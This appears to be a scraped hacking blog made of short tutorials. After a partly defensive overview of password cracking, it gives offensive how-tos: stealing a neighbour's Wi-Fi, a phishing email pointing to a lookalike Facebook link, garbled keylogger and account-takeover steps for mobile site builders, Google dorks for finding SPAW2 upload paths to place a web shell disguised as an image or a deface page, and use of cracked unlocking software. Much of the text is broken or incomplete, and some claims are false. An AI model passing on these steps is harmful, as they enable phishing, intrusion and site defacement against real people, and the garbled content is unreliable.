employed as a hash and its output as a
hashed password.
If a system uses a reversible function to
obscure stored passwords, exploiting that
weakness can recover even 'well-chosen'
passwords.
One example is the LM hash that Microsoft
Windows uses by default to store user
passwords that are less than 15 characters
inlength.
LM hash breaks the password into two 7-
character fields which are then hashed
separately, allowing each half to be attacked
separately.
Hash functions like SHA-512, SHA-1, and MD5
are considered impossible to invert when
used correctly.
2) Guessing :-Many passwords can be
guessed either by humans or by
sophisticated cracking programs armed with
dictionaries(dictionary based) and the user's
personal information.
Not surprisingly, many users choose weak
passwords, usually one related to themselves
in someway. Repeated research over some
40 years has demonstrated that around 40%
of user-chosen passwords are readily
guessable by programs. Examples of insecure
choices include:
* blank (none)
* the word "password","passcode", "admin"
and their derivatives
* the user's name or login name
* the name of their significant other or
another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard
layout (eg, the qwerty keyboard -- qwerty
itself, asdf, or qwertyuiop)
* a simple modification of one of the
preceding, such as suffixing a digit or
reversing the order of the letters.
and so on....
In one survery of MySpace passwords which
had been phished, 3.8 percent of passwords
were a single word found in a dictionary,
and another12 percent were a word plus a
final digit; two-thirds of the time that digit
was.
A password containing both uppercase &
lowercase characters, numbers and special
characters too; is a strong password and can
never be guessed.
Check Your Password Strength
3) Default Passwords :-A moderately high
number of local and online applications have
inbuilt default passwords that have been
configured by programmers during
development stages of software. There are
lots of applications running on the internet
on which default passwords are enabled. So,
it is quite easy for an attacker to enter default
password and gain access to sensitive
information. A list containing default
passwords of some of the most popular
applications is available on the internet.
Always disable or change the
applications' (both online and offline) default
username-password pairs.
4) Brute Force :-If all other techniques failed,
then attackers uses brute force password
cracking technique. Here an automatic tool is
used which tries all possible combinations of
available keys on the keyboard. Assoon as
correct password is reached it displays on
the screen.This techniques takes extremely
long time to complete, but password will
surely cracked.
Long is the password, large is the time taken
to brute force it.
5) Phishing :-This is the most effective and
easily executable password cracking
technique which is generally used to crack
the passwords of e-mail accounts,and all
those accounts where secret information or
sensitive personal information is stored by
user such as social networking websites,
matrimonial websites, etc.
Phishing is a technique in which the attacker
creates the fake loginscreen and send it to
the victim, hoping that the victim gets fooled
into entering the account username and
password. As soonas victim click on "enter"
or"login" login button this information
reaches to the attacker using scripts or
online form processors while the user(victim)
is redirected to home page of e-mail service
provider.
Never give reply to the messages which are
demanding for your username-password,
urging to be e-mail service provider.
It is possible to try to obtain the passwords
through other different methods, such as
social engineering, wiretapping, keystroke
logging, login spoofing,dumpster diving,
phishing, shoulder surfing, timing attack,
acoustic cryptanalysis, using a Trojan Horse
or virus, identity management system attacks
(such as abuse of Self-service password
reset) and compromising host security.
However, cracking usually designates a
guessing attack.
#MY GUY AFTER READING THIS, I GUESS U GO
KNOW HW TO SECURE YA SELF AND PASSW0RD.
#IF U FIND DIZ INF0 CREATIVE AND
IMP0RTANT, AND U DIDNT C0MMENT, GOD IS
WATCHING U 000....
HOW To USE JOOMSCAN TO FIND JOOM VULN IN BACKtrack5 linux
Joomscan is one ofpenetratoion testingtool that help to find the vulnerability injoomla CMS. The updated versioncan detects 550 Vulnerabilities. Let me show howto use this joomscan in Backtrack5. Download the Joomscan from HERE!!!Step 1: Moving to PenTest folderCopy/Move thedownloaded filesin directory /pentest/web/scanners/joomscan/ Step2: Set Permission Now, you have to set permission for the Joomscan file. In order to this, Type the following command in Terminal (if you don't know how to open terminal at all, please stop reading this and start it from basics of Linux). CHMOD 0777 joomscan.pl [image] Step 3: Update the scanner to latest version. To do this, enter the following command in Terminal: ./joomscan.pl update Step 4: Scanning for VulnerabilityNow everything ok, we have to scan our joomla site for vulnerability. To do this, enter thefollowing command in Terminal: ./joomscan.pl -u www.YourJoomlasite.com Wait for a while, and it will list of the vulnerability found. This tutorial is completely for Educational purpose only.
HOW TO CRACK WI-FI PASSWORDS USING AN ANDROID PHONE
How to Crack Wi-Fi Passwords with Your
Android Phone and Get Free Internet! Want
to take advantage of your neighbor's super
fast Wi- Fi connection? If they're smart, they
probably have it password protected
(otherwise you wouldn't be reading this,
would you?). But if you have an Android
phone, you can get back at them for always
parking in your spot and slamming the door
when they get home at 2 a.m.—by
stealing...er, borrowing, their connection. A
group of researchers came up with a hack
to get around hardware limitations and add
monitor mode to Android devices to allow
them to crack Wi-Fi passwords. Monitor
mode lets you see all the traffic going
through a network and how many devices
are connected to it, but it can also be used
for more nefarious purposes. If you're
patient enough, you can crack the WEP key
on a network by capturing data packets in
monitor mode. To add monitor mode to an
Android device, the researchers reverse
engineered the Broadcom radio chip. They
modified the firmware on the chipsets in
the Nexus One and Galaxy S II, which are the
same ones used in the majority of mobile
devices. The code is posted on Google Code,
but you'll need to know which chipset you
have and download the right one for your
phone. Once you've downloaded the code,
it's as simple as extracting the .zip file, then
running the setup and configuration files.
They've included instructions for each
chipset and a few different devices , so head
over there to find the specifics for yours.
After it's up and running, check out one of
our tutorials to learn how to use it to crack
the key. So, next time your neighbor wants
to borrow your power drill, rest assured
that you're "borrowing" something much
more valuable from them! Enjoy!!
AN EASY WAY TO FOOl SOMEONE TO yOUR PHISING LINK
Then create a nice email like
this:server@gmail or wateva
den send
"Your account has compromised
the user policy on facebook or yahoo or gmail and
it will be blocked and deleted in
24hours if you fail to recover
your account through our
verification page here >> http://
faecboook.wapka.mobi"
NOTE: This is for educational
purpose and I am not
responsible for anything you do
with this tutorial
You can shortened your site
address or you can hide it with
an html like this http://yahoo or gmail/verify.php
Note: Remove the space in btw
"<" and "a" and the space btw
< / a >
Probably your friend or victim
will click on the link and once
he/she login through that your
clone site. The person email and
password will be save
EAsY WAYS TO HACK A WAPKA OR MUF.MOBI SITE
Note that this tutorial is for
educational use
only & must
not be used anyhow.......
Itzz vewi easy to hack a
friend muf.mobi or mobile.web.tr
site.....just
follow the following
steps.......1.Register with the
username which u want to
use in d site .....
2..Use diss as ur password $$$$$$
3.after
that,u login....
4.then send
the person which u wanna hack a
friend request......
5,immediately
the person grant ur
request,block the
user....
6.Register immediately with that
persons
username &
use
the previous code as ur
password.......Thatz all...uve
hacked the siteowner easily......
Now i wanna tech u guys wat
javascript,wml
&
keylog are & 0u they re
used in hacking a website
down......??...........T
he first 2
are computer language the
last is a file..:for u to hack a wapka
site...u
must be known to them......Note:if
u
dont understand the 1st
tutorial then u can never
understand this cozz datz
itz basis
Script writers & breakerzz needz
to b more
alert.....cozz a simple
mistake while flexing yah
script on yah keylog...1st
download keylogger into
yah system....now xtract d file &
unzipp
it.....move to a
brand new folder...open
it..scroll down to wml
server...left click now just
scroll down to insert
script.....Note:im teaching u guys
dizz tutorial
on based
on educational reasons &
not 4 u to misuse it cozz not
my concern.....back to my tutorial
when u get down
to insert script,right click on it
twice,then it
openz a
page...insert this script
there my show.....the place i wrote
my
show,u
can write anyfin just make
sure u know wat uve
written offhead....then
scroll down & mark javanot
removal...then create an acct @
wapka.mobi.....or
muf.mobi or facebook or
yahoo or gmail or
watsoever the site u wanna
hack is under....e.g if the site u
wanna hack is a wapka
site,create a
new
wapka site,if itzz muf.mobi
create a new muf.mobi site
if itz a yahoo acct u wanna
hack,create a yahoo acct,if
itz fazbuk,create fazebuk & the
rest just creat
an acct in
which the site u wanna
hack is under..make sure ur pw
for d site which u
created has password $$$$
$$ now use that same pw &
username to
register in the
site u wanna hack...then just go to
the site owners
profile,vote him bad....then
open yah
keylogger,immediately,it openzz
differnt
files,locate the 1 u used 4 ur
javascript...ie the 1 u used
in place of myshow.....1st u
have to delete the forum of
the site u wanna hack...just open
any forum topic &
using fake login page
which uve must have
already registered 4 @
jotform.com...
HOW TO HACK A SITE USING KM.SQl
how to hack a web site with km.sql
this is the step
1 goto to any site u woint to hack and and
try this
[ http://the site.com/forum/post.php] it we
show white dat mens u can hack d site all u
need to do is to goto d forum creat a topic
and put d this code in the name of the topic
the first box put this code ==>
---------------------------------
And then in the 2nd box put this
HOW TO REVEAL THE PASSWORD BEHIND ASTERISK(**********)
Did Want to Reveal the Passwords Hidden
Behind Asterisk (****) ?
Follow the steps given below-
1)Open the Login Page of any website. (eg.
http://mail.yahoo.com)
2)Type your 'Username' and 'Password'.
3)Copy and paste the JavaScript code given
below into your browser's address bar and
press 'Enter'.
javascript: alert(document.getElementById
('Passwd'.value);
4)As soon as you press 'Enter', A window
pops up showing Password typed by you..!
Note :-This trick may not be working with
firefox
HOW TO ROOT YOUR JAVA fONE AND START MINIMIsING
This is one of the most wanted tutorial
especially for java users who have been
trying and thinking of ways they can make
there java phone minimize, so today i will be
sharing with you a trick i used to make my
java phone start minimizing like symbain and
android smartphones.
Requirement Needed
phoenix service suite which u can be google
search it 2 downloaded it into yourlaptop or
desktop
Steps On How To Root Your JavaPhone
Step 1: Dial *#0000# on your phone
Step 2: After dialing it you will see something
like this RM_614 or any number
Step 3: Google search for Rm_614 or any
thing you see but make sure when searching
for it include .ppu to it, for example
Rm_614.ppu then download it to your laptop
Step 4: After you have downloaded connect
your phone to your laptop using aUSB cable
Step 5: After you have connected your phone
to your laptop make sure you choose ovi
suite mode
Step 6: Open phoenix service suite and runit
on your laptop and click on scan product
Step 7: After you have click scan,look by the
side and select product profile
Step 8: After you have click it locate your
Rm_614.ppu depending on what you
downloaded and select it
and you will see a list appear, just tick them
all and where ever you see 0 change it to 1.
Step 9: After you are done with that clickon
enable tck and flashand your phone will
restart and pop a warning message
saying"WARNING TCK FLAG SET" don't get
pernic after that pop restart your phone and
you aredone,
can you see it something simpleand very easy
to do, so i will liketo hear your views about it
via comment and also visit Ojcyber 2 see daily
updates
Note: when downloading d 'phoenix service
suite' make sure u disable ur antivirus cos
dapp do nt contain virus
How to Unlock Huawei E303 Modems Using DC Unlocker for Free
Although DC Unlocker is free to download,
you will need to buy credits before you can
use it to unlock most new modem. But in this
post today, I will be showing you how to use
this software without paying a dime.
1. http://is.gd/gidiunlockto download full cracked
version or CLICK HERE to download DC
Unlocker from MF.
2. Extract the content of the .zip file.
3. Once you’ve extracted all the required files,
run “dccrap.exe”
4. Disconnect your internet connection and
plug your USB Modem with a different
operator SIM. (for Huawei users, you don’t
need to swap any SIM). And insertyour
modem to the USB port.
5. Choose what “manufacturer” that your
modem is. (Huawei Datacards or ZTE
Datacards… choose anyone that matches on
your Modem.)
6. Click the magnifying glass, and it will
search for plugged USB modems.
7. Once the modem is detected, click ‘Server
Menu’ (login page), type whatever you want.
It’s just alame login system.
8. Click Unlocking Menu, then choose
“Unlock”.
9. Wait till the unlocker program says that
“unlock is successfully done”.
10. Now, enjoy your unlocked Modem.
That’s it!
Now, you have a universal modem that can
work on any Nigerian GSM SIM card.
NOTE: This may not work for some E303
modem.
Also, you don’t need to buy any voucher or
credit from DC Unlocker. This software has
been nulled/cracked. So it can unlock all sort
of modems and phones without buying
credits.
I hope it works for you, let’s hear your
feedback. If you have any question, please
drop your comment below
how to use any sim on moderm without unlockin it
Even up till now, Some Members have not
been able to Use any SIM on their Internet
Modem {Unlock}, We have decided to Publish
this Tutorial in order to enable them use
different Sim Cards in their Modem without
Unlocking.
Its Very Simple but you will need to have
Nokia PC Suite Installed on your PC before this
Tutorial can be Useful for You. Lets Get
Started!
HOW TO USE ANOTHER SIM IN YOUR MODEM
WITHOUT UNLOCKING
1. Download Nokia PC Suite to your PC HERE
or Google Search for it Online.
2. Insert any SIM into your Modem {Even if it
is not Unlocked} and Plug to your PC.
3. Your Modem will display Invalid SIM
Warning, just ignore it and close modem
software.
4. Start NOKIA PC suite.
5. Click on File > Connect to the Internet, Then
click on the the Spanner Like Icon to
Configure it.
6. Select your Modem from the List, and Input
the Operator APN setting as when you
wanna use Nokia mobile connection.
Eg:-Airtel = internet.ng.zain.com||MTN =
web.gprs.mtnnigeria.net||Glo= glogwap||
Etisalat = etisalat
7. Finish Set up.
8. Now connect to internet through PC suite.
9. Wow!!! You are connect to the Internet
using your PC Suite + Modem without
unlocking the modem.
NOTE:-You can insert another Sim Card and
follow the above steps then you put the APN
of the network provider and you are good to
go.
Click on the Like Button if You Appreciate this
Tutorial...
Thursday 22 May 2014
SIMPLE GOOGLE DORKS TO TAKE DOWN SITES VULN
open www.google.com
enter The Dork inurl:"spaw2/dialogs/"
or
inurl:"spaw2/uploads/files/"
You will Got results Like this " Index of/ spaw2/dialogs/"
or : site.com/abc/spaw2/uploads/files /abc/abc.pdf
Now replace TheSpaw2/Uploads/abc/abcur with this url
for example i got this website
so Now i will replcae
with
Now the URL is
Now you will Got a window like this (click to see)
if you want to Upload deface page then Select files option ... and i f you want to upload shell then select image option and upload your shell as shell.php;,jpg
see You uploaded deface here
www.site.com/profile/spaw2/uploads/
Subscribe to:
Posts (Atom)